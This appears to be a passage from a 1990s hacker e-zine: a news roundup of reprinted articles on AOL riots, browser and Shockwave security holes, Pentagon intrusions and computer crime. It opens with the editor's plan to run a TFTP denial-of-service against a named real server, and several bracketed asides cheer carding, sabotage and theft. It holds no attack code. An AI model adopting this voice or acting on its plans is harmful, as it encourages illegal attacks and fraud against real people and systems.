didn't this month since it would take up alot of room, and i am majorly behind deadline) and see how long it would take to kill nether.net . I think that i will go down fairly fast since the server is so fuckin lagged, since it has about a million users on, and since it is ann arbor's undernet site.) Well, that is all on TFTP. Check out the files section of our HBS site, since if i get the TFTP DOS code, i will add it there. _____________________________________________________________ -------------- --=[The News]=-- Compiled & edited by KungFuFox -------------- 1 : AOL 'Hacker Riot' More Like Amateur Hour 2 : Bug or Feature? Redmond Slow To Respond 3 : Technocops fight hacker threat 4 : Linux Faithful Defuse Bliss Panic 5 : Did Croatian teen hackers break Pentagon codes? 6 : Cracking Enjoys Renaissance in Eastern Europe 7 : Nokia Rolls Out Wireless Pay Phone 8 : Survey sounds alarm about computer crime 9 : NASA Web site briefly closed due to hackers 10: Shockwave Security Hole Leaves Email Exposed 11: H.323: It's 'Open Sesame' in Firewall Speak 12: Go Ahead, Be Paranoid : Hackers Are Out to Get You 13: Threat of 'techno' terrorism being explored 14: Usenet Servers under Assault 15: Usenet News Servers Take a Beating 16: Man waits 20 years for phone line but dies before getting it 17: Only in California... [I love California, but that's the title.] "Adolescent crackers wreak havoc to get attention and stoke their egos." -Felipe Rodriquez, Founder of xs4all, a Holland-based ISP _____________________________________________________________ AOL 'Hacker Riot' More Like Amateur Hour by Mark Glaser [This article made me sick, but I was laughing at the same time] 8:57am PST 17 Feb 97 -- After threatening America Online with a raging "hacker riot" that would toss people out of chat rooms, cancel accounts, and spread viruses, the so-called Valentine's Day Massacre was mostly noise and bluster, signifying nothing. And many AOL users would have been hard-pressed to tell if there was a riot going on: They wouldn't have known if any access problems were due to hackers or AOL's overloaded systems, according to David Cassel, who maintains the AOL List at aolsucks.org. A message had been forwarded to hundreds of AOL users, saying that hackers would rampage at 9 p.m. EST. Planning meetings for the hackers were held at 6 p.m. to plot strategy. At the appointed hour, more than 300 hackers gathered in private chat rooms and distributed at least seven different programs to "create hell on AOL," according to one eyewitness. The hackers then fanned out to public rooms and proceeded to do basic tricks of the trade: scrolling text too fast to read, kicking out chatters, and using macros that spewed out text like "RIOT!!! RIOT!!! RIOT!!!" and "Get Ready to Corrupt." The hackers, who went by screen names such as ReVOLTnow [Which trade do they think those are 'basic tricks' of? Damn lamers...] and Lov2HakU, caused havoc into the night but most damage was cosmetic: There were no reports of viruses or downed servers, and many of the troublemakers had their rogue accounts cancelled. The hacking was reportedly a reponse to AOL's recent shoddy service. Many of [There's that word again, 'hacking'. If I had a nickel for every time I mistook a warez kiddie for a hacker, I'd be broke.] the hackers trade pirated software in private chat rooms, named "wares," and were mad at the recent spate of busy signals due to AOL's ramped-up membership. But most observers and veteran AOL users attributed the attack to bored teenagers who were not adept hackers. One AOL chat room guide called the attack "pretty lame." [At least somebody knows what they're talking about.] Cassel said that the riot was probably the work of amateurs. "Real hackers wouldn't publicize their activities in advance," he said. "And AOL is such a big target with pretty low security (despite what they say). This was an opportunity for these hackers to send a message to AOL and to pound their chest a bit." AOL maintains that the riot did only minor damage, and downplayed fears of viruses by saying that only downloaded and executed files could wreak havoc. Cassel, a longtime critic of AOL, said that its 3.0 software has the ability to update users' software without asking permission. If hackers could access that capability, viruses could be spread and cause a great deal of damage. Company spokespeople refused to comment on that possibility. This is not the first such attack on AOL. In the fall of 1995, AOL came down on software piracy of Macromedia products and punished some hackers. The piraters exacted revenge by rioting during a Macworld forum, taking over the stage and reportedly stealing AOL chairman Steve Case's email account. ©1993-97 Wired Ventures, Inc. _____________________________________________________________ Bug or Feature? Redmond Slow To Respond by Kate Farnady [This is the story before microsoft got to edit it.] 11:55am 4.Mar.97.PST -- Microsoft is "too busy looking at the big picture," said Paul Greene, the discoverer of the latest Microsoft Explorer 3.0 security hole - a bug that Green says has been in the software since its release on 13 August 1996. "They're missing the details," he said. Greene said he happened upon the bug - which can remotely trigger the execution of files on the user's machine - last week, by accident. He and his two roommates, Geoff Elliott and Brian Morin, juniors at Worcester Polytechnic Institute, first notified Microsoft via email at 4 a.m. last Thursday. Elliott said Microsoft PR assured him that the bug was not a big deal. In order for this bug to work, said the email, the perpetrator must have the aliased program on his hard drive and know where the file is stored. Greene responded to Microsoft's ambivalence with a public Web site, Cybersnot, that demonstrates the bug. The site launched on Saturday. Paul Balle, Microsoft product manager for Internet Explorer, said Microsoft first learned about the bug on Monday. "As soon as we found out about it, we immediately deployed a team of project managers and developers to address the issue," said Balle, who told Wired News that they had a fix for the bug in testing, and that it would be posted to Microsoft's Web site within the next 24 hours. Greene discovered the bug while doing group work, using a Web site to pass along files. He used the IE option to create a "shortcut," or alias to a file stored on his hard disk, and then placed it in the HTML on his Web site. The three students found that by embedding a .lnk or .url tag in the HTML, a user can create an alias which will open a program on the unsuspecting Web surfer's desktop. Says Morin, "Everyone is looking at Java and ActiveX, and not looking closely enough at what happens when the browser is tied so closely to the desktop." This bug is unrelated to ActiveX. "There are plenty of programs that come with Windows that can do a lot of damage," says Elliott. For example, a link could be created that might automatically open the format utility that MSIE stores in the Command folder. This could potentially erase the Web surfer's hard disk. "And that's only one of the many things that might strike terror in the hearts of PC users," says Paul. Further, the three students found that IE's cache folder stores files not in the folder itself, but in a subdirectory. Unlike Netscape, which scrambles the file names in the cache folder, IE stores the files, names intact, in a hidden subdirectory. "We assume Microsoft suspected this might be a security risk," says Elliott, "otherwise why would they have created a hidden folder." With access to the cache subdirectory, a malicious user could make use of the shortcut bug to place any file on the unsuspecting surfer's hard disk. But the bug, and Microsoft's ambivalent response to the student's email, haven't soured these PC users. "Nobody is handling security on the Internet very well," says Elliott. "We don't know how to connect 6 million computers with high security. The Web hasn't had the 20 years Unix has had [to develop security], and even Unix isn't secure." Elliott told Wired News of spending the morning thinking of ways to use this bug as a browser virus. "But we're bored of that," he explains. "The sad thing is, this could really be a great feature," says Greene. "It could be used to help fix things on your desktop." ©1993-97 Wired Ventures, Inc. _____________________________________________________________ Technocops fight hacker threat March 2, 1997 From Correspondent Louise Schiavone WASHINGTON (CNN) -- When criminals rob a bank, you call the police. When they break into an office building and threaten mayhem, you call the SWAT team. But how about when they break into your computer system and wreak havoc? Is there someone to call? You bet. Meet CERT -- the Computer Emergency Response Team. "Late Friday afternoons are often times of crisis moments for a site. They may find that their site has been compromised and they can't wait until Monday to deal with it," explains Kathy Fithen, manager of CERT Daily Operations. These -- well, computer nerds -- are the rescue team of the future. And according to the Justice Department, the future is already here. "These crimes are becoming more serious, there's more money at stake and the crimes are more malicious," says Martha Stansell-Gamm of the U.S. Justice Department. "We are seeing more destruction, more threats, more theft of valuable information in general." [WE are seeing more corruption, more theft from the taxpayers, and more lies, so fuck off.] Not long ago, a hacker invaded Internet access provider Erol's system with an obscene, racist message for its 140,000 subscribers. Last summer, hackers broke into the Justice Department's Web site, posting swastikas and pictures of Adolf Hitler. And a few years ago, two college students hacked their way into Boeing's computers in search of password files. The Justice Department says that situation is a classic case of how hackers can drive up business costs. "We were also able to ascertain that these hackers had obtained root access to the federal courthouse system in Seattle. After the case was over, it cost Boeing, I believe, $57,000 simply to check the integrity of their avionics data," Stansell-Gamm says. Based at Carnegie Mellon University in Pittsburgh, CERT works with the federal government, using mostly Defense Department dollars. CERT doesn't claim to be a policing agency, and many businesses have their own team of computer emergency specialists to stay one step ahead of the technocriminals of the '90s. In fact, last year a survey of Fortune 1,000 firms found that more than half had detected attempts to gain computer access. At least 11 attempts were successful. _____________________________________________________________ Linux Faithful Defuse Bliss Panic by Kristi Coale 7:43pm 26.Feb.97.PST -- An anti-virus software company is busily backpedalling after announcing earlier this month that it had "discovered" and countered the first Linux virus. "[Bliss] is a stupid virus," said Joe Wells, a software consultant who maintains an index of proliferating computer viruses. "It's an alarmist approach that draws people's attention to something that's not a real threat and takes their eyes off the things that are boring but more of a threat," he said. McAfee Software, a developer of anti-viral software, announced it had discovered and created an antidote for Bliss on 6 February. The company claimed that the hostile code was infecting Linux operating systems - a popular free version of Unix. But the tone of the announcement raised the ire of Linux users on the blinux-list mailing list. While McAfee said the Bliss virus wasn't widespread, its announcement characterized the virus as serious and spreading in the public domain. But Bliss was not destructive. It was distributed primarily as "proof of concept" code (i.e., proof that a Linux virus could exist), to people on a security mailing list who knew what it was. "I learned a lot of lessons from Bliss," admitted Jimmy Kuo, senior virus researcher for the Santa Clara, California-based McAfee Software. "Bliss sounded more scary than it should have been. [In subsequent releases] we have tried to include more technical information." Wells said Bliss is an overwriter virus, a piece of code that destroys its host. Without a host, a virus has little chance of spreading. This led Wells and other anti-virus experts, including Dave Chess, research staff member at IBM's Thomas J. Watson Research Laboratory, to conclude that Bliss is not much of a threat. Bliss exists mostly for people to run on their systems as a study of virus behavior, a common practice among those who work on anti-viral technologies, said Chess. "When it's infecting, it will tell you - infecting:(file name) and it keeps a log on the disk of the infected files," he said. Further, the program saves clean copies of every file that it infects. Kuo, a well-respected anti-virus researcher, said a part of the confusion over Bliss stemmed from the different interpretations of such expressions as "in the wild," the phrase the anti-viral community uses to describe a virus that is in the public domain and therefore poses a threat. To Kuo, a virus has to meet five criteria before it is "in the wild," including the existence of a critical mass of users of an operating system. "Many people are running Linux at home on $800 machines. When the number of users of a platform goes up, the average user's technical capability goes down," said Kuo. Linux had been virus-free since its initial release in 1991. Kuo said it takes two to three years for viruses to catch up with new operating systems. With that criterion, Bliss is the sign that Linux has attained the status of an established platform. Bliss is also a warning that other hostile code awaits, said Wells, who noted that of the 10,000 viruses in existence, only 200 to 300 pose a real threat. "[Bliss] will be just like the Boza fiasco [the first Windows 95 virus] last year, and people will know it's possible to write viruses for Linux," said Wells. ©1993-97 Wired Ventures, Inc. _____________________________________________________________ Did Croatian teen hackers break Pentagon codes? February 20, 1997 ZAGREB, Croatia (Reuter) -- Three teen-age computer hackers in Croatia may have broken Pentagon protection codes and copied highly classified files from U. S. military bases, local media reported. The Zagreb daily Vecernji List said Wednesday that the three high school students, surfing the Internet on their home computer, applied a search program and deciphered codes, barging into the database of several military installations. The databases included those of the Anderson nuclear installation and an unnamed satellite research center, the newspaper reported. However, Pentagon officials expressed doubt this could have happened. "There is no way that anybody can tap into classified files via the Internet," Pentagon spokeswoman Lt. Col. Donna Boltz told Reuters. Such files, she said, are almost always on closed systems without outside access. But personal e-mail or other sensitive files might be invaded by hackers on the Internet, she added. After the news broke, reporters flocked to the high school in the Adriatic port of Zadar where the three teens, ages 15 and 16, specialize in mathematics and informatology. One of the hackers, identified only as V.M., told the state news agency HINA he accessed the Pentagon data base while surfing the net January 2. Despite being warned that he was not allowed to proceed, he continued to browse the site until the data of the Anderson base were displayed on the screen, HINA said. "The data are compressed and need to be extracted, so I don't really know everything they contained, but it sure was very interesting," V.M. told the agency. [Top-notch ueberleeter wows reporters with a buncha technical jargon about his oly stumbling block - he couldn't unzip the shit he stole.] He maintained he was unaware of any possible consequences. ©1997 Reuters Limited. _____________________________________________________________ Cracking Enjoys Renaissance in Eastern Europe by Kristi Coale 4:43am 28.Feb.97.PST -- A smoldering indignation lies at the root of the recent attacks on US Pentagon computers by Eastern European crackers. The West, and particularly the United States, is a prized target of these crackers, who see these breaches as an opportunity to jeer at the United States' perceived technological superiority. The US and other Western countries are basking in the glow of the information revolution, a movement that has created a new industry from which many are earning a healthy living. Meanwhile, life in the former Communist countries of Eastern Europe is less sanguine. The march toward democratic systems is slow, and jobs are not easy to find for those with the technological skills. With time on their hands, they press their knowledge of networks and computer languages into service via cracking. "People in Eastern Europe are well-educated, yet they can't make money and attain living standard of their often less-educated Western peers - which builds up a resentment," said expatriate Croatian journalist Ivo Skoric via email. "So the education basically just makes us unhappy - because we are able to see and understand how very well fucked up we are: education in this case gives both tools and reasons to do [cracking]," he said. In January, three Croatian high school students cracked their way into Pentagon computers and accessed what they believed to be Pentagon secrets. The Pentagon, which has said that no classified information was compromised in the attack, apparently sustained considerable damage - approximately US$500,000, according to the Zagreb daily newspaper Vecernji List. The Pentagon refutes these claims. "There was no information or indication that classified information was accessed," said Major Chris Geisel, Air Force spokesman. "The amount of the damage won't be determined until after the investigation is finished." [In other words, "we're still too embarrassed to tell you how much damage was done."] In the meantime, the Air Force is working closely with Croatian police to investigate the incident, Geisel said. This break-in is one of several originating from Eastern European countries in recent months. In January, a Romanian teenager set off a series of ping and syn-flood attacks against a number of IRC servers around the world. And Bosnia and Croatia have been home to other cracking incidents involving Pentagon computers, said Skoric. Earlier this month, youths in Zlatar Bistrica, a small town north of Zagreb, broke into Pentagon computers and had their equipment seized by Croatian police. Adolescent crackers wreak havoc to get attention and stoke their egos, said Felipe Rodriquez, a founder of xs4all, a Holland-based ISP. In the case of the Croatian high school students, their teacher and parents celebrated their actions as an achievement made possible by their technical acumen. But cracking is on the rise in Eastern Europe mostly because people can get away with it: There are no laws against these activities. Internet service providers and others in the Eastern European technical community attribute this gap in law enforcement to the lack of understanding by the populace that cracking is considered a crime in other countries. The attacks also stem from a different set of priorities in a region whose economic and governmental systems are in flux, said Tin Blaskovic, a Croatian university student. "You have to understand that countries in transition have bigger problems on their backs, like stabilizing [a] newly established system," Blaskovic said via email. "When that is completely done, I believe something will be done about such problems as cracking." Western European countries such as Holland channel the energies of crackers toward developing more secure computer systems. In Holland, cracking is now illegal, but it used to be a "hacker's haven," said Rodriquez, whose ISP employs a number of ex-crackers to develop security systems. Other former crackers Rodriquez knows are busy developing smartcards for banks, setting up the first Dutch freenet system, and writing encryption software. In fact, xs4all, set up by former crackers, was the first ISP in The Netherlands, Rodriquez said. "We do not believe hackers should be repressed. Instead, they should be stimulated to use their talents creatively; to secure poorly designed systems," he said. [Any hacker that does that is called a fucking sellout.] ©1993-97 Wired Ventures, Inc. _____________________________________________________________ Nokia Rolls Out Wireless Pay Phone by Gene Koprowski 2:41pm 4.Mar.97.PST -- Nokia America has introduced a new digital wireless phone that is designed to bring pay telephone service to buses, subway trains, and taxi cabs over the global system for mobile (GSM) network. But a top telecom analyst questioned whether the device would be appropriate for all those venues. [Big smile] The small, wireless pay phone, the GSM 1900, was revealed at the Cellular Telecommunications Industry Association trade show in San Francisco this week. Nokia spokeswoman Megan Matthews said the product operates over the the same network technology, GSM, which is employed by Personal Communications Service Providers. Nokia has inked deals with the PCS purveyors for trials in "several markets" to test the 1900-MHz technology on public transportation, she said. Matthews would not reveal where the products will being tested. A 900-MHz version of the technology that works with overseas cellular standards has been sold to phone companies in Thailand. The technology has a sizable graphical user interface, and hands-free functionality. "This is an additional way for the new PCS providers to make more money on their network," said Matthews. "They are able to provide a service that cannot be achieved by a conventional pay-phone system. You can go and stick one up on a wall and it will work. You don't need an additional black box. There is a built-in transceiver." [Oh what I wouldn't do to rip one of these.] Matthews says that public wireless phones could have been implemented years ago, but were not, largely because the cellular-phone market was dominated by Bell companies, which already had an infrastructure of landline-based pay phones in place. The price of the phone calls is likely to be priced comparably to standard wireless phone calls, not at the rate that is akin to calls for air phones. "It will probably be very similar to what their air time rates are for regular wireless subscribers," Matthews said. "It be a lot cheaper (than air phones on airplanes). If you were in a subway system, you wouldn't want to pay US$25 for a call. You might as well go to the wire line." The company does not envision users plunking quarters into the device, however. Credit cards or charge cards will be used to pay for the services. The phones can also interact with smart cards or electronic-purse applications. [Carders, start your engines.] David Cooperstein, a telecom strategies analyst at Forrester Research, said the marketers of the technology have to make a compelling argument to users in order to generate demand. "Pay phones are everywhere in this country," says Cooperstein. "If it is going to be more expensive than your typical pay phone, then there has to be some compelling reason to use it, like it is more available than the pay phones that are already out there. If it is more expensive, people would probably just wait a few more minutes to get to the regular pay phone." ©1993-97 Wired Ventures, Inc. _____________________________________________________________ Survey sounds alarm about computer crime March 7, 1997 SAN FRANCISCO (Reuter) -- A computer security group sounded an alarm about computer crime Thursday after U.S. companies and other organizations it surveyed reported losing $100 million due to high-tech crime. [Let's just call it downsizing of profits.] Three-quarters of the 563 U.S. corporations, government agencies, financial institutions and universities that responded to the survey by the Computer Security Institute reported suffering financial losses in the last 12 months due to computer security breaches. The breaches ranged from computer viruses and laptop theft to financial fraud, theft of proprietary information and sabotage. [Sabotage is not recommended unless your employer is evil.] Losses suffered by the 249 organizations that were able to estimate them totaled $100 million in the last year, said the Computer Security Institute, a San Francisco-based association of information security professionals. Institute Director Patrice Rapalus said the survey's findings about financial losses due to security breaches "should sound the alarm for corporations and government agencies." She said the level of awareness of computer crime had risen slightly since the institute carried out its first survey last year but most organizations still were not doing enough to counter it. Richard Power, a spokesman for the institute, said it was likely that computer crime cost billions of dollars each year in the United States, although this was not based on data from the survey. Power said there was a need for more information security staff, more security training for computer network administrators and for greater cooperation between the private sector and law enforcement. The organizations reported $24.9 million in losses from financial fraud, $22.7 million due to telecommunications fraud, $21 million from theft of proprietary information, $4.3 million from sabotage of data or networks, $12.5 million from computer viruses and $6.1 million from theft of laptop computers, the institute said. [If you count laptops as warez, we got figures on the whole H/P/C/V/A/W scene's success right there.] The number of organizations that suffered an intrusion or other unauthorized use of computer systems in the last 12 months rose to 49 percent in the latest survey from 42 percent in the 1996 survey, the institute said. However, only 17 percent of respondents who suffered computer intrusions reported them to law enforcement, the survey found. Fear of negative publicity was a key reason organizations did not report them, it found. ©1997 Reuters Limited. _____________________________________________________________ NASA Web site briefly closed due to hackers March 7, 1997 CAPE CANAVERAL, Florida (Reuter) -- Computer hackers found their way into NASA's No. 1 site on the World Wide Web and posted a political manifesto, forcing the U.S. space agency to take the popular location off-line, a spokeswoman said Thursday. The hackers, who called themselves H4G13, left a message online Wednesday claiming responsibility for the intrusion. Brian Dunbar, NASA's Internet services manager, said the group berated officials for jailing well-known hackers and promised to launch an attack on corporate America for commercial use of the internet. "During the next month, we the members of H4G13 will be launching an attack on corporate America. All who profit from the misuse of the Internet will fall victim to our upcoming reign of digital terrorism," the message said. [Hopefully skepticism that they won't go through with their threat isn't accurate.] The message was up for about half an hour and the site was operating as usual Thursday morning, Dunbar said. It was the first time hackers had ever broken into that NASA server, which is located at the Goddard Space Flight Center in Greenbelt, Maryland. NASA officials said they would move the public Web page, at www.nasa.gov, to a new server. Besides providing information for public use, the server is used by NASA scientists and researchers to exchange information on solar research. The data is considered "proprietary," but not classified. It was not clear whether the hackers had had access to the data. Dunbar said NASA was investigating the incident. ©1997 Reuters Limited. _____________________________________________________________ Shockwave Security Hole Leaves Email Exposed by Michael Stutz 10:02am 13.Mar.97.PST -- Last week, the Web security booby prize went to Microsoft Internet Explorer. This week, it's Netscape's turn. The latest hole to be added to the list of recent security gaffes involves Macromedia Shockwave and Netscape Navigator. A malicious user can read and copy a Web surfer's private email - including supposedly deleted messages - without their knowledge, and even access internal Web servers behind corporate firewalls. David de Vitry, an application developer at Poppe Tyson Interactive, discovered the security hole and announced Monday on his Web site that Netscape users who have installed Macromedia's Shockwave plug-in are at risk. Shockwave was recently awarded Best World Wide Web Plug-In by the Software Publisher's Association. Macromedia claims the free software is installed on more than 20 million desktops. To demonstrate the flaw, de Vitry set up a Web page that shows how a Web server can obtain your email upon connecting - no links or forms need be selected. "I was just browsing my Netscape Mail and I discovered how Netscape handles addressing email," said de Vitry, referring to Netscape's use of the mailbox URN. "It took me by surprise, and [the means] to implement [the hole] just sort of clicked with my Shockwave experience." Utilizing the default path to a Windows user's mailbox - C:/Program Files/Netscape/Navigator/Mail/Inbox - and sending a mailto: query with Shockwave's GETNETTEXT command, a cracker could develop a Shockwave movie that reads the user's current email. With a few more commands, that email could be saved to a data variable and sent back to the Web server, where it could be copied and saved. By changing the path from the Inbox to, say, the Trash, a Shockwave movie could then retrieve email messages that were thought deleted by the user. "It's much like accessing a file, because you're just accessing a mail file. With the mailbox URN you can access any file on the system as long as its in the same format, which is text with email headers," said de Vitry. "Because of the security model, Java applets can't access files on your computer. Shockwave doesn't have the same security model," said de Vitry. "Unlike the other [recent security holes], which allowed you to erase a person's hard drive (and, through complicated means, obtain information), this one you can easily get information back. It has interesting uses." Using these same concepts, it's possible to break the security of corporate firewalls. "The other main vulnerability," said de Vitry, "is the fact that it can use [the Web's] hypertext transfer protocol to access any Web server." Including those on secure intranets - provided you know the URL. The victim must be using Netscape Navigator 3.0, or possibly 2.0, on either the Windows 95 or Windows NT platform, and have Macromedia's Shockwave plug-in installed. Finally, Netscape Email must be used as the email interface. While de Vitry claims he informed both Netscape and Macromedia late Tuesday night, neither company has contacted him. Dave Kennedy, research team chief with the National Computer Security Association, commented that "[The security breach] doesn't surprise me, and I predict it will happen more in the future. Internet Explorer had three last week, Java had one, and now it's Netscape's turn in the barrel. "I have more confidence in Netscape than Internet Explorer with respect to the security of their different products," said Kennedy. "But with the plug-in problem, my peers in the security community are scared of the implications of the increased user functions without regard to security," he said. Shockwave is Macromedia's proprietary technology for delivering and experiencing multimedia over the Web for Windows or Macintosh computers. The plug-in modules are created with Macromedia's Director multimedia authoring tool. As of Wednesday evening, Mary Leong of Macromedia said the company had been unaware of the bug. "The Shockwave team are now in investigation mode in full force," she said. "We'd really like the opportunity to verify this, and then offer insight or solution if applicable," she said. Netscape could not be reached for comment. ©1993-97 Wired Ventures, Inc. _____________________________________________________________ H.323: It's 'Open Sesame' in Firewall Speak by Kurt Opprecht 7:30pm 7.Mar.97.PST -- Corporate firewalls, electronic fortresses that safeguard company secrets, may soon let their guard down a little to allow Internet telephony to seep through - that is, if everyone involved speaks the same language. An industry group led by Intel and Cisco Systems on Thursday completed an Internet video telephone call through a corporate firewall, a procedure they say did not compromise the overall security of the network. The group said this development will make possible multimedia support in applications like email. What made the demonstration possible was the use of H.323, an Internet communications standard for audio and video telephony, said Milind Khare, product manager in Intel's architecture labs. With widespread use of this lingua franca in firewall networking and telephony technologies, all systems should be secure. If a packet speaks H.323, then the firewall supporting the protocol will recognize it as an Internet phone call and let it pass into the network. But a packet that doesn't use H.323 will not be allowed inside. Still, the notion that a firewall will let some forms of outside communications into a network could be a little disconcerting to corporate netizens. Nonetheless, Khare said the prospects for mischievous and malicious attacks, including spoofed packets masquerading as Internet phone calls, are not possible. "As far as we know, [H.323 communications] are not spoofable. Hypothetically, if you could spoof them, you could do nothing more than conduct an Internet phone call," Khare said. Security experts concurred that this allowance represents little compromise to a corporate network. "Any time you open up a new service that allows any type of data through, that poses a risk," said Eugene Spafford, professor of computer science at Purdue University. The problem, Spafford maintains, is that too many people think of a firewall as an all-in-one fix to security problems. "It's like saying, if we put a fence around the building with a guard at the gate we'll never have to worry about security. That's ridiculous," he said. ©1993-97 Wired Ventures, Inc. _____________________________________________________________ Go Ahead, Be Paranoid : Hackers Are Out to Get You March 17, 1997 By STEVE LOHR In a chilly, windowless room in a New York suburb, four men are tapping furiously at their laptop computers. Their mission: to crack into the computer system of a major U.S. corporation. Things seem to be going well, for them. "All right, we're through the firewall," announced one bearded hacker. A few moments later, a second practitioner of high-tech mischief pronounced himself pleased by what he saw inside -- a digital picture of vulnerability rendered by the lines of computer code dancing across his screen. "Looks like we can toast it," he said. Charles Palmer, a slender, bearded 40-year-old computer scientist, looked on with pride at the members of his team. Skilled hackers, Palmer noted, are scarce these days, at least ones that he will hire. "It's hard to find good people in this field who do not have criminal records," he explained. Palmer and his team work for IBM, and their brand of computer hacking is legal. Companies pay the IBM squad to attack their computer systems to test how well they can stand up to the increasing assaults by real hackers. The growing ranks of cyber intruders are engaged in everything from snooping around to "parking" pornography and pirated software on unsuspecting corporate machines to computer-assisted fraud and theft. White-hat hackers, like those at IBM, are only one kind of computer-security professional whose skills are much in demand today. Once an arcane specialty, computer security has moved into the mainstream. As companies rush onto the Internet, they benefit from improved communication with customers, suppliers and far-flung employees, but they also take on far greater risk that their corporate computer systems will be breached by outsiders with malicious intent. The dangers of a networked world have created boom times for computer-security consultants, auditors, cryptographers and others. Now they must contend with pushy headhunters as well as hackers. Five years ago, six-figure salaries were rare in the security field. Today it is not uncommon for skilled computer-security veterans to be making $200,000 a year or more. Recognizing a seller's market for computer-security expertise, Wietse Venema has come to the United States, and he's selling. A computer scientist from the University of Eindhoven in the Netherlands, Venema is the co-author of Satan, a sophisticated software program intended to find security flaws in any computer system linked to the Internet. The 45-year-old Dutch researcher is considering offers from IBM and other leading American computer companies. "Many people are interested in my capabilities now," he observed cheerfully. Experts like Venema are suddenly stars because corporations are spending more on computer security. This year, companies worldwide are expected to spend $6.3 billion on security for their computer networks, estimates Dataquest, a market-research firm. Within three years the security price tag is projected to more than double to nearly $12.9 billion -- a figure that is only for services supplied by outside contractors, so it excludes spending on in-house staff, security software or hardware products. The industry in the United States, the world leader in computer security, is composed of hundreds of companies. They run the gamut from large companies with worldwide computer consulting practices, like IBM, Science Applications International Corp. and Perot Systems, and Big Six accounting firms, like Coopers & Lybrand, Ernst & Young and Deloitte & Touche, down to one-man independent consultants, like Seiden. Fueling the surge in computer-security spending is fear. The corporate concerns are heightened with every report of hackers defacing well-known World Wide Web sites, like the recent attacks on the sites of the CIA and the Department of Justice. The FBI says few intrusions into corporate computer systems -- 15 percent at most -- are reported to law-enforcement agencies. But the handful that are reported, like the 1994 case of Russian hackers who tapped into Citibank and made $10 million in illegal fund transfers (all but $400,000 was recovered), tend to cause alarm. "The business is not so much network security as it is network insecurity," noted Alice Murphy, an analyst at Dataquest. "There's so much anxiety out there now." Just how great the threat is to corporate computer systems is a matter of debate. The Internet, observes Peter Neumann, a computer scientist at SRI International, a research group in Menlo Park, Calif., was never really designed to be secure. Once the bailiwick of a small community of researchers, it is starting to be used as a freeway of commerce. "The infrastructure is vulnerable," Neumann said. "From that larger perspective the risks are enormous." Dan Farmer, the co-author of Satan with the Dutch researcher Venema, did a survey of 1,700 corporate and government Web sites late last year and found that more than 60 percent of them had "serious potential security vulnerabilities." Farmer, a programmer at Sun Microsystems Inc., did not break into the computer systems, but he said they were open to attack and often could be severely damaged. (His survey results are posted on the Web.) Yet there is a significant difference, some analysts say, between potential vulnerability and the actual business risk to corporate computer systems. "There is risk, but the threat tends to be vastly overstated," said George Colony, president of Forrester Research Inc., a consulting firm in Cambridge, Mass. Forrester estimates that losses from fraud in Internet commerce are likely to be roughly $1 for every $1,000 of business. To put the matter into perspective, the fraud losses in cellular phone service are $20 for every $1,000, according to Forrester, while the losses on credit-card transactions are nearly $2 for every $1,000 of goods charged. Still, even skeptics, like Forrester's Colony, agree that computer security requires continuous attention. "It is a manageable risk, and it should not deter companies from jumping into Internet commerce," Colony said. "But I also tell our clients that they should think of computer security as a guerrilla war that will last forever." The FBI is treating the battle against computer crime as a long-running campaign. All new agents are now trained in cyberspace investigations as part of the curriculum at the FBI Academy in Quantico, Va. And last year the bureau established three computer-crime squads in San Francisco, New York and Washington, to pursue cybercrime more aggressively. "We're really on the cusp of this becoming a major problem," said James Kallstrom, head of the FBI office in New York. "As more and more of the economy goes digital, there are huge incentives for criminal attacks on American corporations." Computer crime, of course, comes in many forms. An employee with a grudge and access to a company's computer network may well be far more dangerous, and costly, than even the most artful hacker. A survey released two weeks ago by the Computer Security Institute, and conducted on behalf of the FBI's computer-crime unit, estimated computer security losses last year at $100 million -- a total only among some 250 companies and organizations that would place dollar figures on their losses from fraud, theft of trade secrets and other breaches. The criminal hackers have long been engaged in a kind of cat-and-mouse game with law-enforcement agencies and private computer-security experts. And that game is increasingly being played at a higher level, with greater skill and new tools. The cell-phone hackers of the past, who electronically jimmied phones for the thrill and free phone service, have graduated to Web-site hacking. Today there are an estimated 440 hacker bulletin boards, 1,900 Web sites purveying hacking tips and tools, and 30 hacker publications like "Phrack" and "2600: The Hacker Quarterly." There are readily available software programs for hacking tactics like "war dialing," "sniffing" and "fingering" -- all used to exploit security weaknesses in computer systems. [Hacker publications? Oh no! Evil knowledge spreaders!] "As the stakes become higher, the technical sophistication of the people doing this kind of illegal activity is increasing," said Edward Hart, a senior vice president of Science Applications International. Today there is a brisk illicit market in hacking, according to security experts, with the street price for breaking into a corporate Web site typically in the $8,000-to-$10,000 range. Bonus payments are usually demanded for trade secrets pilfered or damage inflicted on a competitor's computer system. Limiting the risk, and damage, to corporate computer systems is the goal of Palmer and the other security specialists at IBM. The test hacking done by his team is mainly a fact-finding tool, and only one of many. The authorized break-ins by these groups, called "tiger teams," are often more valuable as a marketing tactic than as a research tool. Thick and exhaustive studies of a company's computer security can be met with yawning indifference by top executives, but a break-in gets their attention. Mundane rules, not high-tech wizardry, are crucial to reducing security risks. A robust firewall to filter what electronic traffic gets into a company's computer system is helpful, but it can be a Maginot Line approach to security -- the real weaknesses are elsewhere. To work from home, employees may have dial-up modems at their desks, unprotected by firewalls or even passwords. Employees, security experts warn, must be told to give their passwords to no one; one scam is for hackers to call new employees, pretending to be members of the corporate technology staff doing a check of passwords. Another frequent weakness is simple physical security, watching who goes in or out of the building. These are hectic times for security consultants like IBM's Nick Simicich, a 44-year-old self-taught programmer. He works from his home in Boca Raton, Fla., equipped with powerful computers running Linux, a shareware program that is the operating system of choice for hackers. Mostly, though, Simicich is on the road -- 85 percent of the time, he estimates -- logging perhaps 150,000 air miles a year. Continental, the airline he flies most regularly, invited Simicich to a company parade last year. He proudly calls himself a "paid professional paranoid." His goal, he says, is not to make corporate computer systems immune to hackers. "That's impossible," he explained. "Our real goal is to raise the bar. First, we do want to make it harder for them to break in, so the average hacker moves to an easier target. Second, when they do get in, we want to ensure that the damage is limited." ©1997 The New York Times _____________________________________________________________ Threat of 'techno' terrorism being explored Air travel, stock trading among potential targets March 18, 1997 SAN FRANCISCO (CNN) -- Last year, a tree fell across a power line in Wyoming, causing a rippling blackout across nine Western states. Now, security experts are wondering if a computer hacker could throw a virtual tree -- a disruptive computer message -- across the nation's communication lines, causing a meltdown of vital information systems. "The telephone system, the public switch network, is vulnerable," says Clinton Brooks of the National Security Agency, who serves on a presidential panel looking at ways to outsmart potential hackers. Also on Brooks' litany of potential targets: The air traffic control system, stock exchanges, the Defense Department, the Federal Reserve, the IRS and Social Security. And he says many other information systems that deliver basic needs to people in their daily lives are also subject to attack -- traffic lights, banking systems and ATM and credit card networks. Dangers and defenses: In October, 